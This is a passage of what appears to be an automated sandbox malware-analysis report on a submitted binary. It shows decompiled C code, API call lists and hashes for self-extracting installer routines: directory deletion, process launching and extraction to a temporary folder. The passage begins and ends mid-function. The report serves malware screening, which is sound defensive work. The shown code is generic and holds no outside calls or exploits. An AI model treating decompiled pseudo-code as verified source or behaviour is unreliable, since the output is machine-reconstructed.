				SetFileAttributesA( &_v280, 0x80);
				DeleteFileA( &_v280);
			} else {
				if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
					E00A416B3( &_v276, 0x104,  &(_v596.cFileName));
					_t58 = 0x104;
					E00A4658A( &_v280, 0x104, 0xa41140);
					E00A42390( &_v284);
				}
			}
			_t36 = FindNextFileA(_t63,  &_v596); // executed
		} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00A48A3A,00A411F4,00A48A3A,00000000,?,?), ref: 00A423F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A411F8), ref: 00A42427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A411FC), ref: 00A4243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A42495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00A424A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A424AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00A424BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00A48A3A), ref: 00A424C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: f462d6ef5236b1f824578e65bb8075355e472bc44e1e20c364b4229bc081c22e
                                                                                                                                                                                                                                            • Instruction ID: 551320749d09c588694c99dc19d245e6f1bea2b4d3f1ce39d98cb74f3cd50efd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f462d6ef5236b1f824578e65bb8075355e472bc44e1e20c364b4229bc081c22e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3731B33D204740ABC320EBE8DD89BEBB3ACEFC5305F44492DB55586290EB74994DC752
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 675 a43fef-a44010 676 a44016-a4403b CreateProcessA 675->676 677 a4410a-a4411a call a46ce0 675->677 678 a440c4-a44101 call a46285 GetLastError FormatMessageA call a444b9 676->678 679 a44041-a4406e WaitForSingleObject GetExitCodeProcess 676->679 693 a44106 678->693 682 a44070-a44077 679->682 683 a44091 call a4411b 679->683 682->683 687 a44079-a4407b 682->687 688 a44096-a440b8 CloseHandle * 2 683->688 687->683 690 a4407d-a44089 687->690 691 a44108 688->691 692 a440ba-a440c0 688->692 690->683 694 a4408b 690->694 691->677 692->691 695 a440c2 692->695 693->691 694->683 695->693
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E00A43FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E00A46CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0xa48a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0xa49a2c; // 0x0
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0xa49a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A4411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0xa49a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE ref: 00A44033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A44049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 00A4405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A4409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A440A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A440DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00A440E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: 3071cdfcc8b0afd7b35b35f2ebc27fb720f829e795462021c54409f521230b95
                                                                                                                                                                                                                                            • Instruction ID: 4c1031b9637a94940b3e37a74187e2c95eb4e102514ca58a340e3639a635da5e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3071cdfcc8b0afd7b35b35f2ebc27fb720f829e795462021c54409f521230b95
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5131A23D680218ABEB20DBA9DC49FAB777CEBDA741F1002A9F505D2161C7354D86CB11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E00A42BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				signed char _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0xa4a288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0xa49124 = 0;
                                                                                                                                                                                                                                            				if(E00A42CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E00A42F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E00A452B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0xa48a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0xa49a2c; // 0x0
                                                                                                                                                                                                                                            							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E00A41F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0xa48588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 =  *0xa49124; // 0x80070002
                                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                                            			}



















APIs
• GetVersion.KERNEL32(?,00000002,00000000,?,00A46BB0,00A40000,00000000,00000002,0000000A), ref: 00A42C03
• GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A46BB0,00A40000,00000000,00000002,0000000A), ref: 00A42C18
• GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A42C28
• CloseHandle.KERNEL32(00000000,?,?,00A46BB0,00A40000,00000000,00000002,0000000A), ref: 00A42C98
Strings
Memory Dump Source
• Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
• Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
Similarity
• API ID: Handle$AddressCloseModuleProcVersion
• String ID: HeapSetInformation$Kernel32.dll
• API String ID: 62482547-3460614246
• Opcode ID: 0ff4edb13b7074082a13512b24292d3142f477ad55d280a5557bf5efba7b247c
• Instruction ID: 0222f3e29a21ca0b81d8d6c48eabfd564e59ec18d6432b99543f58f6a56a0a2b
• Opcode Fuzzy Hash: 0ff4edb13b7074082a13512b24292d3142f477ad55d280a5557bf5efba7b247c
• Instruction Fuzzy Hash: 2D11E17D640315ABD720AFF9ADC8B6F3769ABC9392B840125F901E3251DA72DC83C761
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A46F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E00A46EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a46f45
                                                                                                                                                                                                                                            0x00a46f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A46F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: f6bb4c687c496ccbbcb02a22f2906aa0d37ed78c7e2c7cd8c3a9d6c86c22fda4
                                                                                                                                                                                                                                            • Instruction ID: 2c9e60953de671c4f60bd32b29c4af7513a606b9887aac8467c76aa6838989b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6bb4c687c496ccbbcb02a22f2906aa0d37ed78c7e2c7cd8c3a9d6c86c22fda4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B90026C2911406796145BB49D1A41575D16ADF702B815960A111C4494DB6140415513
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A455A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E00A4468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E00A4468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0xa49a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0xa48b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0xa48a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E00A46517(_t82, 0x7d2, 0, E00A43210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa49a30; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0xa491e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0xa491e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E00A41781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E00A46952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E00A4597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E00A42630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E00A4658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0xa491e4;
                                                                                                                                                                                                                                            																					E00A41781(0xa491e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E00A45467(0xa491e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E00A42630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E00A4597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E00A45467(0xa491e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0xa491e4;
                                                                                                                                                                                                                                            											_t70 = E00A42630(0, 0xa491e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0xa491e4;
                                                                                                                                                                                                                                            												_t71 = E00A45467(0xa491e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E00A4597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
